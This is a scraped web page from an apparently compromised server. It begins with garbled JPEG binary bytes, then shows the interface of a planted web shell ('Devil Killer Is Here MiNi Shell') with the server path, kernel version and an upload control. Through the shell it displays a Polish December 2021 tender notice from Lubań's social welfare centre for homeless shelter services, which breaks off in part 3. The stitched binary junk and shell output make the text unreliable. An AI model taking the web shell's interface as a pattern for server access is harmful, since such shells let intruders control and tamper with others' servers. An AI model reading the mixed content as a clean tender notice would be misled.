JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211213/0031280501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług schronienia wraz z wyżywieniem, zapewnienie niezbędnego ubrania i niezbędnych warunków socjalnych osobom bezdomnym skierowanym przez Miejski Ośrodek Pomocy Społecznej w Lubaniu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Ośrodek Pomocy Społecznej w Lubaniu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003271107</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Lompy 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lubań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-800</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">75 646 0411</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mopsluban@op.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://mops.luban.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług schronienia wraz z wyżywieniem, zapewnienie niezbędnego ubrania i niezbędnych warunków socjalnych osobom bezdomnym skierowanym przez Miejski Ośrodek Pomocy Społecznej w Lubaniu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7797ac19-5c15-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00312805</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://mops.luban.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu : https://miniportal.uzp.gov.pl,<br/>ePUAPu https://epuap.gov.pl oraz poczty elektronicznej mopsluban@op.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca musi posiadać konto na ePUAP. Wykonawca ma dostęp do formularzy: złożenia, zmiany,<br/>wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>-Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, cyfrowych odwzorowań<br/>dokumentów oraz informacji przekazanych przy ich użyciu zostały opisane w Regulaminie korzystania<br/>z miniPortalu oraz Regulaminie ePUAP.<br/>-Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego<br/>akceptuje warunki korzystania z miniPotrtalu, określone w Regulaminie miniPortalu oraz zobowiązuje<br/>się korzystając z miniPortalu przestrzegać tego regulaminu<br/>-Maksymalny rozmiar plików przesłanych za pośrednictwem dedykowanych formularzy do : złożenia,<br/>zmiany, wycofania oferty oraz do komunikacji wynosi 150MB. Za datę przekazania dokumentów<br/>elektronicznych, cyfrowych odwzorowań dokumentów oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP, a w przypadku przekazywania tych dokumentów oraz informacji za pomocą<br/>poczty elektronicznej- datą ich przesłania będzie potwierdzenie dostarczenia wiadomości zawierającej<br/>dokument/informację z serwera pocztowego zamawiającego.<br/>-Zamawiający zamieścił link do postępowania oraz ID postępowania na stronie internetowej<br/>zamawiającego. Dane postępowania można wyszukać również na Liście wszystkich postępowań<br/>klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania na<br/>miniPortalu<br/>-W postępowaniu o udzielenie zamówienia komunikacja pomiędzy zamawiającym a wykonawcami w<br/>szczególności składanie dokumentów elektronicznych(innych niż oferta oraz załączniki do<br/>oferty)cyfrowych odwzorowań dokumentów oraz przekazywanie informacji odbywa się elektronicznie<br/>za pośrednictwem dedykowanego formularza dostępnego na ePUAPoraz udostępnionego przez miniPortal( Formularz do komunikacji)We wszelkiej korespondencji związanej z niniejszym<br/>postępowaniem zamawiający i wykonawcy posługują się numerem ogłoszenia (BZP), ID postępowania<br/>lub numerem referencyjnym postępowania Dps.EK.341.5.2021.3 Zamawiający może również<br/>komunikować się z wykonawcami za pomocą poczty elektronicznej, e-mail: mopsluban@op.pl<br/>- Dokumenty elektroniczne ( inne niż oferta i załączniki do oferty) oraz cyfrowe odwzorowania<br/>dokumentów składane są przez wykonawcę za pośrednictwem Formularza do komunikacji jako<br/>załączniki. Zamawiający dopuszcza również możliwość składania w/w dokumentów elektronicznych<br/>oraz cyfrowych odwzorowań dokumentów za pomocą poczty elektronicznej, na adres e- mail<br/>mopsluban@op.pl<br/>-Sposób sporządzenia dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz<br/>informacji musi być zgodny z wymaganiami określonymi w rozporządzeniu Rady Ministrów z dnia 30<br/>grudnia 2020 roku w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie<br/>-Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej, wskazanych w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.9.) Sposób dostępu do narzędzi elektronicznego modelowania danych budowlanych: <span class="normal">nie dotyczy</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest<br/>Miejski Ośrodek Pomocy Społecznej w Lubaniu reprezentowany przez Dyrektora Ośrodka. Z<br/>administratorem danych można się kontaktować pod adresem korespondencyjnym plac Józefa Lompy<br/>1, 59-800 Lubań, telefonicznie pod nr tel. (75) 646 04-11 lub za pośrednictwem poczty elektronicznej<br/>mopsluban@op.pl.<br/>2. Inspektorem Ochrony Danych w Miejskim Ośrodku Pomocy Społecznej jest pan Ryszard Skowron.<br/>W każdym przypadku osoba, której dane dotyczą, może również skontaktować się bezpośrednio z<br/>inspektorem ochrony danych elektronicznie pod adresem poczty elektronicznej ido@miastoluban.pl lub<br/>pod wyżej podany adres korespondencyjny z dopiskiem „inspektor ochrony danych”.<br/>3. Administrator danych przetwarza podane przez Panią/Pana dane w celu:<br/>a) związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonego<br/>w trybie ustawy Prawo zamówień publicznych,<br/>b) podpisania umowy z wybranym kontrahentem,<br/>c) obowiązkach ciążących na administratorze np. co do przechowywania dokumentacji.<br/>4. Podstawą prawną przetwarzania Pani/Pana danych osobowych jest:<br/>a) art. 6 ust. 1 lit. e) RODO dla celów określonych w punktach a) i c) w związku z:<br/>• ustawa z dnia 24 czerwca 2021 r.. Prawo zamówień publicznych,<br/>• ustawa z dnia 27 sierpnia 2009 roku o finansach publicznych,<br/>• rozporządzenie Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r.<br/>w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać zamawiający od wykonawcy,<br/>• rozporządzenie Ministra Rozwoju, Pracy i Technologii z dnia 18 grudnia 2020 r.<br/>w sprawie protokołów postępowania oraz dokumentacji postępowania o udzielenie zamówienia<br/>publicznego,<br/>• a także inne akty prawne regulujące postępowania w sprawie zamówień publicznych.<br/>b) art. 6 ust. 1 lit. b) dla celu określonego w punkcie b).<br/>5. Pani/Pana dane mogą zostać przekazane podmiotom lub organom uprawnionym na podstawie<br/>przepisów prawa lub usługodawcą, którym w drodze umowy powierzono przetwarzanie danych na<br/>potrzeby realizacji usług świadczonych dla Miejskiego Ośrodka Pomocy Społecznej.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 18 Ustawy Pzp postępowanie o udzielenie zamówienia jest jawne. Zamawiający może ograniczyć dostęp do informacji związanych z<br/>postępowaniem o udzielenie zamówienia tylko w przypadkach określonych w Ustawie Pzp.<br/>6. Pani/Pana dane osobowe będą przetwarzane przez okres niezbędny do realizacji celu dla jakiego<br/>zostały zebrane oraz zgodnie z terminami określonymi przez przepisy szczegółowe, w tym zgodnie z<br/>art. 78 ust. 1 i ust. 4 Ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie<br/>zamówienia. Zamówienie udzielane jest w trybie art. 359 pkt 2 ustawy - Usługi zamówienia, a jeżeli<br/>czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, a<br/>następnie przechowywane do celów archiwalnych zgodnie z obowiązującym prawem wskazanym w<br/>Zarządzeniu Kierownika Miejskiego Ośrodka Pomocy Społecznej w Lubaniu z dnia 24 maja 2005 roku<br/>w sprawie instrukcji kancelaryjnej i wprowadzonych zmianach Zarządzeniem Dyrektora Miejskiego<br/>Ośrodka Pomocy Społecznej w Lubaniu z dnia 29 sierpnia 2016 roku<br/>7. Dane osobowe nie będą przetwarzane w sposób zautomatyzowany w tym również w formie<br/>profilowania.<br/>8. W związku z przetwarzaniem udostępnionych przez Panią/Pana danych osobowych, w sytuacjach<br/>przewidzianych w Rozporządzeniu RODO przysługuje Pani/Panu prawo do: dostępu do swoich danych<br/>(art. 15 RODO), sprostowania danych osobowych (art. 16 RODO), ograniczenia przetwarzania (art. 18<br/>RODO) i wniesienia sprzeciwu wobec przetwarzania danych (art. 21 RODO).<br/>Aby skorzystać z wyżej wymienionych praw, osoba której dane dotyczą, powinna skontaktować się,<br/>wykorzystując podane dane kontaktowe z Administratorem danych i poinformować go, z którego prawa<br/>i w jaki zakresie chce skorzystać.<br/>9. W przypadku uznania, że przetwarzanie przez administratora danych Pani/Pana danych osobowych<br/>narusza przepisy Rozporządzenia RODO, przysługuje Pani/Panu prawo do wniesienia skargi do<br/>organu nadzorczego tj. Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.<br/>10. Podanie danych osobowych w związku udziałem w postępowaniu o zamówienia publiczne jest<br/>wymogiem ustawowym. Nie podanie danych uniemożliwia udział w postępowaniu o zamówienie<br/>publiczne, a tym samym brak możliwości wyboru kontrahenta i podpisanie z nim umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DPS.EK.341.5.2021.3</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie przez Wykonawcę usług schronienia wraz z wyżywieniem, zapewnienie niezbędnego ubrania i niezbędnych warunków socjalnych a także prowadzenie pracy socjalnej mającej na celu pomoc w załatwianiu podstawowych spraw życiowych, rozwinięcie i wzmocnienie aktywności i samodzielności, przywracanie do życia w środowisku lokalnym oraz usamodzielnienie osób bezdomnych skierowanych przez Miejski Ośrodek Pomocy Społecznej w Lubaniu z uwzględnieniem indywidualnej sytuacji osób kierowanych. <br/>Przedmiot zamówienia realizowany będzie w schroniskach dla osób bezdomnych (zwanych dalej: schroniskami), z podziałem na 3 części:<br/><br/>CZĘŚĆ I<br/>a. Świadczenie usług schronienia tj. udzielenie całodobowego schronienia dla bezdomnych mężczyzn w schronisku wraz z zapewnieniem wyżywienia, niezbędnego ubrania, niezbędnych warunków socjalnych, a także prowadzenie pracy socjalnej mającej na celu pomoc w załatwianiu podstawowych spraw życiowych, rozwinięcie i wzmocnienie aktywności i samodzielności, przywracanie do życia w środowisku lokalnym oraz usamodzielnienie osób bezdomnych.<br/>b. Zamawiający szacuje, że prognozowana liczba osób wymagających schronienia, skierowanych w ciągu roku wynosić będzie - 7 osób.<br/>c. Ze względu na specyfikę przedmiotu zamówienia, podana przez Zamawiającego liczba osób jest wielkością szacunkową. Zamawiający zastrzega sobie możliwość zmniejszenia lub zwiększenia liczby osób w zależności od faktycznych potrzeb w tym zakresie, a Wykonawcy z tego tytułu nie będą przysługiwały żadne roszczenia, w tym pieniężne, wobec Zamawiającego. Zamawiający dopuszcza zwiększenie liczby osób, o której mowa w ppkt b co najmniej o 50%. Zamawiający będzie dokonywał zapłaty za czas faktycznego pobytu osób w schronisku.<br/>d. W przypadku wykorzystania przez Zamawiającego wszystkich miejsc w ilości, o której mowa w ppkt b Wykonawca będzie zobowiązany do utrzymania w gotowości 1 miejsca dla potrzeb Gminy Miejskiej Lubań.<br/>e. Wykonawca zobowiązany jest do zapewnienia standardu obiektu i świadczonych usług w schronisku dla osób bezdomnych zgodnie z załącznikiem nr 2 do Rozporządzenia Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 roku w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. 2018. 896).<br/>f.. Wykonawca w ramach usługi schronienia zobowiązany będzie do zapewnienia osobom skierowanym do schroniska:<br/>• miejsca noclegowego,<br/>• wyżywienia<br/>•	odzieży odpowiedniej do indywidualnych potrzeb osoby oraz pory roku,<br/>•	środków czystości,<br/>•	współpracy w realizacji „Programu wychodzenia z Bezdomności”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-02-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gotowość(G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">odległość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ II<br/>a. Świadczenie usług schronienia tj. udzielenie całodobowego schronienia dla bezdomnych kobiet w schronisku wraz z zapewnieniem wyżywienia, niezbędnego ubrania, niezbędnych warunków socjalnych, a także prowadzenie pracy socjalnej mającej na celu pomoc w załatwianiu podstawowych spraw życiowych, rozwinięcie i wzmocnienie aktywności i samodzielności, przywracanie do życia w środowisku lokalnym oraz usamodzielnienie osób bezdomnych.<br/>b. Zamawiający szacuje, że prognozowana liczba osób wymagających schronienia, skierowanych w ciągu roku wynosić będzie – 1 osoba.<br/>c. Ze względu na specyfikę przedmiotu zamówienia, podana przez Zamawiającego liczba osób jest wielkością szacunkową. Zamawiający zastrzega sobie możliwość zwiększenia liczby osób w zależności od faktycznych potrzeb w tym zakresie, a Wykonawcy z tego tytułu nie będą przysługiwały żadne roszczenia, w tym pieniężne, wobec Zamawiającego. Zamawiający dopuszcza zwiększenie liczby osób, o której mowa w ppkt b maksymalnie o 1 osobę. Zamawiający będzie dokonywał zapłaty za czas faktycznego pobytu osób w schronisku.<br/>d. W przypadku braku osób wymagających schronienia Wykonawca będzie zobowiązany do utrzymania w gotowości 1 miejsca dla potrzeb Gminy Miejskiej Lubań.<br/>e. Wykonawca zobowiązany jest do zapewnienia standardu obiektu i świadczonych usług w schronisku dla osób bezdomnych zgodnie z załącznikiem nr 2 do Rozporządzenia Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 roku w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. 2018. 896).<br/>f. Wykonawca w ramach usługi schronienia zobowiązany będzie do zapewnienia osobom skierowanym do schroniska:<br/>•	miejsca noclegowego,<br/>•	wyżywienia,<br/>•	odzieży odpowiedniej do indywidualnych potrzeb osoby oraz pory roku,<br/>•	środków czystości,<br/>•	współpracy w realizacji „Programu wychodzenia z Bezdomności”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-02-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gotowość(G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">odległość(O)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 